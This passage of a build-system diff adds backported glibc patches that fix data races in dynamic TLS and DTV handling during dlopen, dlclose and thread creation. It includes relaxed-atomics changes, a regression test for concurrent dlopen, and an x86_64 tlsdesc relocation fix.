+DTV setup at thread creation (_dl_allocate_tls_init) is changed
+to take the dlopen lock, GL(dl_load_lock). Avoiding data races
+here without locks would require design changes: the map that is
+accessed for static TLS initialization here may be concurrently
+freed by dlclose. That use after free may be solved by only
+locking around static TLS setup or by ensuring dlclose does not
+free modules with static TLS, however currently every link map
+with TLS has to be accessed at least to see if it needs static
+TLS. And even if that's solved, still a lot of atomics would be
+needed to synchronize DTV related globals without a lock. So fix
+both bug 19329 and bug 27111 with a lock that prevents DTV setup
+running concurrently with dlopen or dlclose.
+
+_dl_update_slotinfo at TLS access still does not use any locks
+so CONCURRENCY NOTES are added to explain the synchronization.
+The early exit from the slotinfo walk when max_modid is reached
+is not strictly necessary, but does not hurt either.
+
+An incorrect acquire load was removed from _dl_resize_dtv: it
+did not synchronize with any release store or fence and
+synchronization is now handled separately at thread creation
+and TLS access time.
+
+There are still a number of racy read accesses to globals that
+will be changed to relaxed MO atomics in a followup patch. This
+should not introduce regressions compared to existing behaviour
+and avoid cluttering the main part of the fix.
+
+Not all TLS access related data races got fixed here: there are
+additional races at lazy tlsdesc relocations see bug 27137.
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/dl-tls.c | 63 +++++++++++++++++++++++++++++++++++++++-------------
+ 1 file changed, 47 insertions(+), 16 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=1387ad6225c2222f027790e3f460e31aa5dd2c54]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 6baff0c1ea..94f3cdbae0 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -475,14 +475,11 @@ extern dtv_t _dl_static_dtv[];
+ #endif
+
+ static dtv_t *
+-_dl_resize_dtv (dtv_t *dtv)
++_dl_resize_dtv (dtv_t *dtv, size_t max_modid)
+ {
+ /* Resize the dtv. */
+ dtv_t *newp;
+- /* Load GL(dl_tls_max_dtv_idx) atomically since it may be written to by
+- other threads concurrently. */
+- size_t newsize
+- = atomic_load_acquire (&GL(dl_tls_max_dtv_idx)) + DTV_SURPLUS;
++ size_t newsize = max_modid + DTV_SURPLUS;
+ size_t oldsize = dtv[-1].counter;
+
+ if (dtv == GL(dl_initial_dtv))
+@@ -528,11 +525,14 @@ _dl_allocate_tls_init (void *result)
+ size_t total = 0;
+ size_t maxgen = 0;
+
++ /* Protects global dynamic TLS related state. */
++ __rtld_lock_lock_recursive (GL(dl_load_lock));
++
+ /* Check if the current dtv is big enough. */
+ if (dtv[-1].counter < GL(dl_tls_max_dtv_idx))
+ {
+ /* Resize the dtv. */
+- dtv = _dl_resize_dtv (dtv);
++ dtv = _dl_resize_dtv (dtv, GL(dl_tls_max_dtv_idx));
+
+ /* Install this new dtv in the thread data structures. */
+ INSTALL_DTV (result, &dtv[-1]);
+@@ -600,6 +600,7 @@ _dl_allocate_tls_init (void *result)
+ listp = listp->next;
+ assert (listp != NULL);
+ }
++ __rtld_lock_unlock_recursive (GL(dl_load_lock));
+
+ /* The DTV version is up-to-date now. */
+ dtv[0].counter = maxgen;
+@@ -734,12 +735,29 @@ _dl_update_slotinfo (unsigned long int req_modid)
+
+ if (dtv[0].counter < listp->slotinfo[idx].gen)
+ {
+- /* The generation counter for the slot is higher than what the
+- current dtv implements. We have to update the whole dtv but
+- only those entries with a generation counter <= the one for
+- the entry we need. */
++ /* CONCURRENCY NOTES:
++
++ Here the dtv needs to be updated to new_gen generation count.
++
++ This code may be called during TLS access when GL(dl_load_lock)
++ is not held. In that case the user code has to synchronize with
++ dlopen and dlclose calls of relevant modules. A module m is
++ relevant if the generation of m <= new_gen and dlclose of m is
++ synchronized: a memory access here happens after the dlopen and
++ before the dlclose of relevant modules. The dtv entries for
++ relevant modules need to be updated, other entries can be
++ arbitrary.
++
++ This e.g. means that the first part of the slotinfo list can be
++ accessed race free, but the tail may be concurrently extended.
++ Similarly relevant slotinfo entries can be read race free, but
++ other entries are racy. However updating a non-relevant dtv
++ entry does not affect correctness. For a relevant module m,
++ max_modid >= modid of m. */
+ size_t new_gen = listp->slotinfo[idx].gen;
+ size_t total = 0;
++ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx));
++ assert (max_modid >= req_modid);
+
+ /* We have to look through the entire dtv slotinfo list. */
+ listp = GL(dl_tls_dtv_slotinfo_list);
+@@ -749,12 +767,14 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ {
+ size_t modid = total + cnt;
+
++ /* Later entries are not relevant. */
++ if (modid > max_modid)
++ break;
++
+ size_t gen = listp->slotinfo[cnt].gen;
+
+ if (gen > new_gen)
+- /* This is a slot for a generation younger than the
+- one we are handling now. It might be incompletely
+- set up so ignore it. */
++ /* Not relevant. */
+ continue;
+
+ /* If the entry is older than the current dtv layout we
+@@ -771,7 +791,7 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ continue;
+
+ /* Resize the dtv. */
+- dtv = _dl_resize_dtv (dtv);
++ dtv = _dl_resize_dtv (dtv, max_modid);
+
+ assert (modid <= dtv[-1].counter);
+
+@@ -793,8 +813,17 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ }
+
+ total += listp->len;
++ if (total > max_modid)
++ break;
++
++ /* Synchronize with _dl_add_to_slotinfo. Ideally this would
++ be consume MO since we only need to order the accesses to
++ the next node after the read of the address and on most
++ hardware (other than alpha) a normal load would do that
++ because of the address dependency. */
++ listp = atomic_load_acquire (&listp->next);
+ }
+- while ((listp = listp->next) != NULL);
++ while (listp != NULL);
+
+ /* This will be the new maximum generation counter. */
+ dtv[0].counter = new_gen;
+@@ -986,7 +1015,7 @@ _dl_add_to_slotinfo (struct link_map *l, bool do_add)
+ the first slot. */
+ assert (idx == 0);
+
+- listp = prevp->next = (struct dtv_slotinfo_list *)
++ listp = (struct dtv_slotinfo_list *)
+ malloc (sizeof (struct dtv_slotinfo_list)
+ + TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo));
+ if (listp == NULL)
+@@ -1000,6 +1029,8 @@ cannot create TLS data structures"));
+ listp->next = NULL;
+ memset (listp->slotinfo, '\0',
+ TLS_SLOTINFO_SURPLUS * sizeof (struct dtv_slotinfo));
++ /* Synchronize with _dl_update_slotinfo. */
++ atomic_store_release (&prevp->next, listp);
+ }
+
+ /* Add the information into the slotinfo data structure. */
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch
new file mode 100644
index 0000000000..eb8ef3161c
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch
@@ -0,0 +1,206 @@
+From f4f8f4d4e0f92488431b268c8cd9555730b9afe9 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 30 Dec 2020 19:19:37 +0000
+Subject: [PATCH] elf: Use relaxed atomics for racy accesses [BZ #19329]
+
+This is a follow up patch to the fix for bug 19329. This adds relaxed
+MO atomics to accesses that were previously data races but are now
+race conditions, and where relaxed MO is sufficient.
+
+The race conditions all follow the pattern that the write is behind the
+dlopen lock, but a read can happen concurrently (e.g. during tls access)
+without holding the lock. For slotinfo entries the read value only
+matters if it reads from a synchronized write in dlopen or dlclose,
+otherwise the related dtv entry is not valid to access so it is fine
+to leave it in an inconsistent state. The same applies for
+GL(dl_tls_max_dtv_idx) and GL(dl_tls_generation), but there the
+algorithm relies on the fact that the read of the last synchronized
+write is an increasing value.
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/dl-close.c | 20 +++++++++++++-------
+ elf/dl-open.c | 5 ++++-
+ elf/dl-tls.c | 31 +++++++++++++++++++++++--------
+ sysdeps/x86_64/dl-tls.c | 3 ++-
+ 4 files changed, 42 insertions(+), 17 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=f4f8f4d4e0f92488431b268c8cd9555730b9afe9]
+Comment: Hunks from elf/dl-open.c and elf/dl-tls.c are refreshed due to offset change.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-close.c b/elf/dl-close.c
+index c51becd06b..3720e47dd1 100644
+--- a/elf/dl-close.c
++++ b/elf/dl-close.c
+@@ -79,9 +79,10 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+ {
+ assert (old_map->l_tls_modid == idx);
+
+- /* Mark the entry as unused. */
+- listp->slotinfo[idx - disp].gen = GL(dl_tls_generation) + 1;
+- listp->slotinfo[idx - disp].map = NULL;
++ /* Mark the entry as unused. These can be read concurrently. */
++ atomic_store_relaxed (&listp->slotinfo[idx - disp].gen,
++ GL(dl_tls_generation) + 1);
++ atomic_store_relaxed (&listp->slotinfo[idx - disp].map, NULL);
+ }
+
+ /* If this is not the last currently used entry no need to look
+@@ -96,8 +97,8 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+
+ if (listp->slotinfo[idx - disp].map != NULL)
+ {
+- /* Found a new last used index. */
+- GL(dl_tls_max_dtv_idx) = idx;
++ /* Found a new last used index. This can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), idx);
+ return true;
+ }
+ }
+@@ -571,7 +572,9 @@ _dl_close_worker (struct link_map *map, bool force)
+ GL(dl_tls_dtv_slotinfo_list), 0,
+ imap->l_init_called))
+ /* All dynamically loaded modules with TLS are unloaded. */
+- GL(dl_tls_max_dtv_idx) = GL(dl_tls_static_nelem);
++ /* Can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx),
++ GL(dl_tls_static_nelem));
+
+ if (imap->l_tls_offset != NO_TLS_OFFSET
+ && imap->l_tls_offset != FORCED_DYNAMIC_TLS_OFFSET)
+@@ -769,8 +772,11 @@ _dl_close_worker (struct link_map *map, bool force)
+ /* If we removed any object which uses TLS bump the generation counter. */
+ if (any_tls)
+ {
+- if (__glibc_unlikely (++GL(dl_tls_generation) == 0))
++ size_t newgen = GL(dl_tls_generation) + 1;
++ if (__glibc_unlikely (newgen == 0))
+ _dl_fatal_printf ("TLS generation counter wrapped! Please report as described in "REPORT_BUGS_TO".\n");
++ /* Can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_generation), newgen);
+
+ if (tls_free_end == GL(dl_tls_static_used))
+ GL(dl_tls_static_used) = tls_free_start;
+diff --git a/elf/dl-open.c b/elf/dl-open.c
+index 09f0df7d38..bb79ef00f1 100644
+--- a/elf/dl-open.c
++++ b/elf/dl-open.c
+@@ -387,9 +387,12 @@
+ }
+ }
+
+- if (__builtin_expect (++GL(dl_tls_generation) == 0, 0))
++ size_t newgen = GL(dl_tls_generation) + 1;
++ if (__glibc_unlikely (newgen == 0))
+ _dl_fatal_printf (N_("\
+ TLS generation counter wrapped! Please report this."));
++ /* Can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_generation), newgen);
+
+ /* We need a second pass for static tls data, because
+ _dl_update_slotinfo must not be run while calls to
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 94f3cdbae0..dc69cd984e 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -96,7 +96,9 @@
+ /* No gaps, allocate a new entry. */
+ nogaps:
+
+- result = ++GL(dl_tls_max_dtv_idx);
++ result = GL(dl_tls_max_dtv_idx) + 1;
++ /* Can be read concurrently. */
++ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result);
+ }
+
+ return result;
+@@ -279,10 +281,12 @@
+ dtv_t *dtv;
+ size_t dtv_length;
+
++ /* Relaxed MO, because the dtv size is later rechecked, not relied on. */
++ size_t max_modid = atomic_load_relaxed (&GL(dl_tls_max_dtv_idx));
+ /* We allocate a few more elements in the dtv than are needed for the
+ initial set of modules. This should avoid in most cases expansions
+ of the dtv. */
+- dtv_length = GL(dl_tls_max_dtv_idx) + DTV_SURPLUS;
++ dtv_length = max_modid + DTV_SURPLUS;
+ dtv = calloc (dtv_length + 2, sizeof (dtv_t));
+ if (dtv != NULL)
+ {
+@@ -687,7 +691,7 @@
+ if (modid > max_modid)
+ break;
+
+- size_t gen = listp->slotinfo[cnt].gen;
++ size_t gen = atomic_load_relaxed (&listp->slotinfo[cnt].gen);
+
+ if (gen > new_gen)
+ /* Not relevant. */
+@@ -699,7 +703,8 @@
+ continue;
+
+ /* If there is no map this means the entry is empty. */
+- struct link_map *map = listp->slotinfo[cnt].map;
++ struct link_map *map
++ = atomic_load_relaxed (&listp->slotinfo[cnt].map);
+ /* Check whether the current dtv array is large enough. */
+ if (dtv[-1].counter < modid)
+ {
+@@ -843,7 +848,12 @@
+ {
+ dtv_t *dtv = THREAD_DTV ();
+
+- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
++ /* Update is needed if dtv[0].counter < the generation of the accessed
++ module. The global generation counter is used here as it is easier
++ to check. Synchronization for the relaxed MO access is guaranteed
++ by user code, see CONCURRENCY NOTES in _dl_update_slotinfo. */
++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
++ if (__glibc_unlikely (dtv[0].counter != gen))
+ return update_get_addr (GET_ADDR_PARAM);
+
+ void *p = dtv[GET_ADDR_MODULE].pointer.val;
+@@ -866,7 +876,10 @@
+ return NULL;
+
+ dtv_t *dtv = THREAD_DTV ();
+- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
++ /* This may be called without holding the GL(dl_load_lock). Reading
++ arbitrary gen value is fine since this is best effort code. */
++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
++ if (__glibc_unlikely (dtv[0].counter != gen))
+ {
+ /* This thread's DTV is not completely current,
+ but it might already cover this module. */
+@@ -961,7 +974,9 @@
+ /* Add the information into the slotinfo data structure. */
+ if (do_add)
+ {
+- listp->slotinfo[idx].map = l;
+- listp->slotinfo[idx].gen = GL(dl_tls_generation) + 1;
++ /* Can be read concurrently. See _dl_update_slotinfo. */
++ atomic_store_relaxed (&listp->slotinfo[idx].map, l);
++ atomic_store_relaxed (&listp->slotinfo[idx].gen,
++ GL(dl_tls_generation) + 1);
+ }
+ }
+
+diff --git a/sysdeps/x86_64/dl-tls.c b/sysdeps/x86_64/dl-tls.c
+index 6595f6615b..24ef560b71 100644
+--- a/sysdeps/x86_64/dl-tls.c
++++ b/sysdeps/x86_64/dl-tls.c
+@@ -40,7 +40,8 @@ __tls_get_addr_slow (GET_ADDR_ARGS)
+ {
+ dtv_t *dtv = THREAD_DTV ();
+
+- if (__glibc_unlikely (dtv[0].counter != GL(dl_tls_generation)))
++ size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
++ if (__glibc_unlikely (dtv[0].counter != gen))
+ return update_get_addr (GET_ADDR_PARAM);
+
+ return tls_get_addr_tail (GET_ADDR_PARAM, dtv, NULL);
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch
new file mode 100644
index 0000000000..f22e52ea99
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch
@@ -0,0 +1,144 @@
+From 9d0e30329c23b5ad736fda3f174208c25970dbce Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Tue, 13 Dec 2016 12:28:41 +0000
+Subject: [PATCH] elf: Add test case for [BZ #19329]
+
+Test concurrent dlopen and pthread_create when the loaded modules have
+TLS. This triggers dl-tls assertion failures more reliably than the
+nptl/tst-stack4 test.
+
+The dlopened module has 100 DT_NEEDED dependencies with TLS, they were
+reused from an existing TLS test. The number of created threads during
+dlopen depends on filesystem speed and hardware, but at most 3 threads
+are alive at a time to limit resource usage.
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/Makefile | 9 ++++--
+ elf/tst-tls21.c | 68 ++++++++++++++++++++++++++++++++++++++++++++++
+ elf/tst-tls21mod.c | 1 +
+ 3 files changed, 76 insertions(+), 2 deletions(-)
+ create mode 100644 elf/tst-tls21.c
+ create mode 100644 elf/tst-tls21mod.c
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=9d0e30329c23b5ad736fda3f174208c25970dbce]
+Comment: Hunks from elf/Makefile are refreshed as per glibc 2.31 codebase.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/Makefile b/elf/Makefile
+index d3e909637a..3241cb6046 100644
+--- a/elf/Makefile
++++ b/elf/Makefile
+@@ -201,7 +201,7 @@
+ tst-unwind-ctor tst-unwind-main tst-audit13 \
+ tst-sonamemove-link tst-sonamemove-dlopen tst-dlopen-tlsmodid \
+ tst-dlopen-self tst-auditmany tst-initfinilazyfail tst-dlopenfail \
+- tst-dlopenfail-2
++ tst-dlopenfail-2 tst-tls21
+ # reldep9
+ tests-internal += loadtest unload unload2 circleload1 \
+ neededtest neededtest2 neededtest3 neededtest4 \
+@@ -312,7 +312,7 @@
+ tst-auditmanymod7 tst-auditmanymod8 tst-auditmanymod9 \
+ tst-initlazyfailmod tst-finilazyfailmod \
+ tst-dlopenfailmod1 tst-dlopenfaillinkmod tst-dlopenfailmod2 \
+- tst-dlopenfailmod3 tst-ldconfig-ld-mod
++ tst-dlopenfailmod3 tst-ldconfig-ld-mod tst-tls21mod
+ # Most modules build with _ISOMAC defined, but those filtered out
+ # depend on internal headers.
+ modules-names-tests = $(filter-out ifuncmod% tst-libc_dlvsym-dso tst-tlsmod%,\
+@@ -1697,5 +1697,10 @@
+ $(objpfx)tst-dlopen-nodelete-reloc-mod16.so
+ LDFLAGS-tst-dlopen-nodelete-reloc-mod17.so = -Wl,--no-as-needed
+
++# Reuses tst-tls-many-dynamic-modules
++$(objpfx)tst-tls21: $(libdl) $(shared-thread-library)
++$(objpfx)tst-tls21.out: $(objpfx)tst-tls21mod.so
++$(objpfx)tst-tls21mod.so: $(tst-tls-many-dynamic-modules:%=$(objpfx)%.so)
++
+ $(objpfx)tst-ldconfig-ld_so_conf-update.out: $(objpfx)tst-ldconfig-ld-mod.so
+ $(objpfx)tst-ldconfig-ld_so_conf-update: $(libdl)
+diff --git a/elf/tst-tls21.c b/elf/tst-tls21.c
+new file mode 100644
+index 0000000000..560bf5813a
+--- /dev/null
++++ b/elf/tst-tls21.c
+@@ -0,0 +1,68 @@
++/* Test concurrent dlopen and pthread_create: BZ 19329.
++ Copyright (C) 2021 Free Software Foundation, Inc.
++ This file is part of the GNU C Library.
++
++ The GNU C Library is free software; you can redistribute it and/or
++ modify it under the terms of the GNU Lesser General Public
++ License as published by the Free Software Foundation; either
++ version 2.1 of the License, or (at your option) any later version.
++
++ The GNU C Library is distributed in the hope that it will be useful,
++ but WITHOUT ANY WARRANTY; without even the implied warranty of
++ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
++ Lesser General Public License for more details.
++
++ You should have received a copy of the GNU Lesser General Public
++ License along with the GNU C Library; if not, see
++ <http://www.gnu.org/licenses/>. */
++
++#include <dlfcn.h>
++#include <pthread.h>
++#include <stdio.h>
++#include <stdatomic.h>
++#include <support/xdlfcn.h>
++#include <support/xthread.h>
++
++#define THREADS 10000
++
++static atomic_int done;
++
++static void *
++start (void *a)
++{
++ /* Load a module with many dependencies that each have TLS. */
++ xdlopen ("tst-tls21mod.so", RTLD_LAZY);
++ atomic_store_explicit (&done, 1, memory_order_release);
++ return 0;
++}
++
++static void *
++nop (void *a)
++{
++ return 0;
++}
++
++static int
++do_test (void)
++{
++ pthread_t t1, t2;
++ int i;
++
++ /* Load a module with lots of dependencies and TLS. */
++ t1 = xpthread_create (0, start, 0);
++
++ /* Concurrently create lots of threads until dlopen is observably done. */
++ for (i = 0; i < THREADS; i++)
++ {
++ if (atomic_load_explicit (&done, memory_order_acquire) != 0)
++ break;
++ t2 = xpthread_create (0, nop, 0);
++ xpthread_join (t2);
++ }
++
++ xpthread_join (t1);
++ printf ("threads created during dlopen: %d\n", i);
++ return 0;
++}
++
++#include <support/test-driver.c>
+diff --git a/elf/tst-tls21mod.c b/elf/tst-tls21mod.c
+new file mode 100644
+index 0000000000..206ece4fb3
+--- /dev/null
++++ b/elf/tst-tls21mod.c
+@@ -0,0 +1 @@
++int __thread x;
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch b/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch
new file mode 100644
index 0000000000..a87afe3230
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch
@@ -0,0 +1,180 @@
+From ba33937be210da5d07f7f01709323743f66011ce Mon Sep 17 00:00:00 2001
+From: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+Date: Fri, 25 Jun 2021 10:54:12 -0300
+Subject: [PATCH] elf: Fix DTV gap reuse logic (BZ #27135)
+
+This is updated version of the 572bd547d57a (reverted by 40ebfd016ad2)
+that fixes the _dl_next_tls_modid issues.
+
+This issue with 572bd547d57a patch is the DTV entry will be only
+update on dl_open_worker() with the update_tls_slotinfo() call after
+all dependencies are being processed by _dl_map_object_deps(). However
+_dl_map_object_deps() itself might call _dl_next_tls_modid(), and since
+the _dl_tls_dtv_slotinfo_list::map is not yet set the entry will be
+wrongly reused.
+
+This patch fixes by renaming the _dl_next_tls_modid() function to
+_dl_assign_tls_modid() and by passing the link_map so it can set
+the slotinfo value so a subsequente _dl_next_tls_modid() call will
+see the entry as allocated.
+
+The intermediary value is cleared up on remove_slotinfo() for the case
+a library fails to load with RTLD_NOW.
+
+This patch fixes BZ #27135.
+
+Checked on x86_64-linux-gnu.
+
+Reviewed-by: Szabolcs Nagy <szabolcs.nagy@arm.com>
+---
+ elf/dl-close.c | 8 +-
+ elf/dl-load.c | 2 +-
+ elf/dl-open.c | 10 --
+ elf/dl-tls.c | 17 +--
+ elf/rtld.c | 2 +-
+ sysdeps/generic/ldsodefs.h | 4 +-
+ 6 files changed, 349 insertions(+), 33 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ba33937be210da5d07f7f01709323743f66011ce]
+Comment: Removed hunks those were related to test. Hunk from elf/rtld.c is refreshed.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-close.c b/elf/dl-close.c
+index 3720e47dd1..f39001cab9 100644
+--- a/elf/dl-close.c
++++ b/elf/dl-close.c
+@@ -77,8 +77,6 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+ object that wasn't fully set up. */
+ if (__glibc_likely (old_map != NULL))
+ {
+- assert (old_map->l_tls_modid == idx);
+-
+ /* Mark the entry as unused. These can be read concurrently. */
+ atomic_store_relaxed (&listp->slotinfo[idx - disp].gen,
+ GL(dl_tls_generation) + 1);
+@@ -88,7 +86,11 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+ /* If this is not the last currently used entry no need to look
+ further. */
+ if (idx != GL(dl_tls_max_dtv_idx))
+- return true;
++ {
++ /* There is an unused dtv entry in the middle. */
++ GL(dl_tls_dtv_gaps) = true;
++ return true;
++ }
+ }
+
+ while (idx - disp > (disp == 0 ? 1 + GL(dl_tls_static_nelem) : 0))
+diff --git a/elf/dl-load.c b/elf/dl-load.c
+index a08df001af..650e4edc35 100644
+--- a/elf/dl-load.c
++++ b/elf/dl-load.c
+@@ -1498,7 +1498,7 @@ cannot enable executable stack as shared object requires");
+ not set up TLS data structures, so don't use them now. */
+ || __glibc_likely (GL(dl_tls_dtv_slotinfo_list) != NULL)))
+ /* Assign the next available module ID. */
+- l->l_tls_modid = _dl_next_tls_modid ();
++ _dl_assign_tls_modid (l);
+
+ #ifdef DL_AFTER_LOAD
+ DL_AFTER_LOAD (l);
+diff --git a/elf/dl-open.c b/elf/dl-open.c
+index a066f39bd0..d2240d8747 100644
+--- a/elf/dl-open.c
++++ b/elf/dl-open.c
+@@ -899,16 +899,6 @@ no more namespaces available for dlmopen()"));
+ state if relocation failed, for example. */
+ if (args.map)
+ {
+- /* Maybe some of the modules which were loaded use TLS.
+- Since it will be removed in the following _dl_close call
+- we have to mark the dtv array as having gaps to fill the
+- holes. This is a pessimistic assumption which won't hurt
+- if not true. There is no need to do this when we are
+- loading the auditing DSOs since TLS has not yet been set
+- up. */
+- if ((mode & __RTLD_AUDIT) == 0)
+- GL(dl_tls_dtv_gaps) = true;
+-
+ _dl_close_worker (args.map, true);
+
+ /* All l_nodelete_pending objects should have been deleted
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 2b5161d10a..423e380f7c 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -126,8 +126,8 @@ oom (void)
+ }
+
+
+-size_t
+-_dl_next_tls_modid (void)
++void
++_dl_assign_tls_modid (struct link_map *l)
+ {
+ size_t result;
+
+@@ -157,7 +157,11 @@ _dl_next_tls_modid (void)
+ }
+
+ if (result - disp < runp->len)
+- break;
++ {
++ /* Mark the entry as used, so any dependency see it. */
++ atomic_store_relaxed (&runp->slotinfo[result - disp].map, l);
++ break;
++ }
+
+ disp += runp->len;
+ }
+@@ -184,17 +188,14 @@ _dl_next_tls_modid (void)
+ atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result);
+ }
+
+- return result;
++ l->l_tls_modid = result;
+ }
+
+
+ size_t
+ _dl_count_modids (void)
+ {
+- /* It is rare that we have gaps; see elf/dl-open.c (_dl_open) where
+- we fail to load a module and unload it leaving a gap. If we don't
+- have gaps then the number of modids is the current maximum so
+- return that. */
++ /* The count is the max unless dlclose or failed dlopen created gaps. */
+ if (__glibc_likely (!GL(dl_tls_dtv_gaps)))
+ return GL(dl_tls_max_dtv_idx);
+
+diff --git a/elf/rtld.c b/elf/rtld.c
+index e3fb2a5b2a..d733359eaf 100644
+--- a/elf/rtld.c
++++ b/elf/rtld.c
+@@ -1612,7 +1612,7 @@
+ /* Add the dynamic linker to the TLS list if it also uses TLS. */
+ if (GL(dl_rtld_map).l_tls_blocksize != 0)
+ /* Assign a module ID. Do this before loading any audit modules. */
+- GL(dl_rtld_map).l_tls_modid = _dl_next_tls_modid ();
++ _dl_assign_tls_modid (&GL(dl_rtld_map));
+
+ /* If we have auditing DSOs to load, do it now. */
+ bool need_security_init = true;
+diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h
+index 176394de4d..9c15259236 100644
+--- a/sysdeps/generic/ldsodefs.h
++++ b/sysdeps/generic/ldsodefs.h
+@@ -1171,8 +1171,8 @@ extern ElfW(Addr) _dl_sysdep_start (void **start_argptr,
+ extern void _dl_sysdep_start_cleanup (void) attribute_hidden;
+
+
+-/* Determine next available module ID. */
+-extern size_t _dl_next_tls_modid (void) attribute_hidden;
++/* Determine next available module ID and set the L l_tls_modid. */
++extern void _dl_assign_tls_modid (struct link_map *l) attribute_hidden;
+
+ /* Count the modules with TLS segments. */
+ extern size_t _dl_count_modids (void) attribute_hidden;
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
new file mode 100644
index 0000000000..899111b118
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
@@ -0,0 +1,56 @@
+From 8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Thu, 11 Feb 2021 11:29:23 +0000
+Subject: [PATCH] x86_64: Avoid lazy relocation of tlsdesc [BZ #27137]
+
+Lazy tlsdesc relocation is racy because the static tls optimization and
+tlsdesc management operations are done without holding the dlopen lock.
+
+This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67
+for aarch64, but it fixes a different race: bug 27137.
+
+Another issue is that ld auditing ignores DT_BIND_NOW and thus tries to
+relocate tlsdesc lazily, but that does not work in a BIND_NOW module
+due to missing DT_TLSDESC_PLT. Unconditionally relocating tlsdesc at
+load time fixes this bug 27721 too.
+---
+ sysdeps/x86_64/dl-machine.h | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/sysdeps/x86_64/dl-machine.h b/sysdeps/x86_64/dl-machine.h
+index 103eee6c3f..9a876a371e 100644
+--- a/sysdeps/x86_64/dl-machine.h
++++ b/sysdeps/x86_64/dl-machine.h
+@@ -570,12 +570,21 @@ elf_machine_lazy_rel (struct link_map *map,
+ }
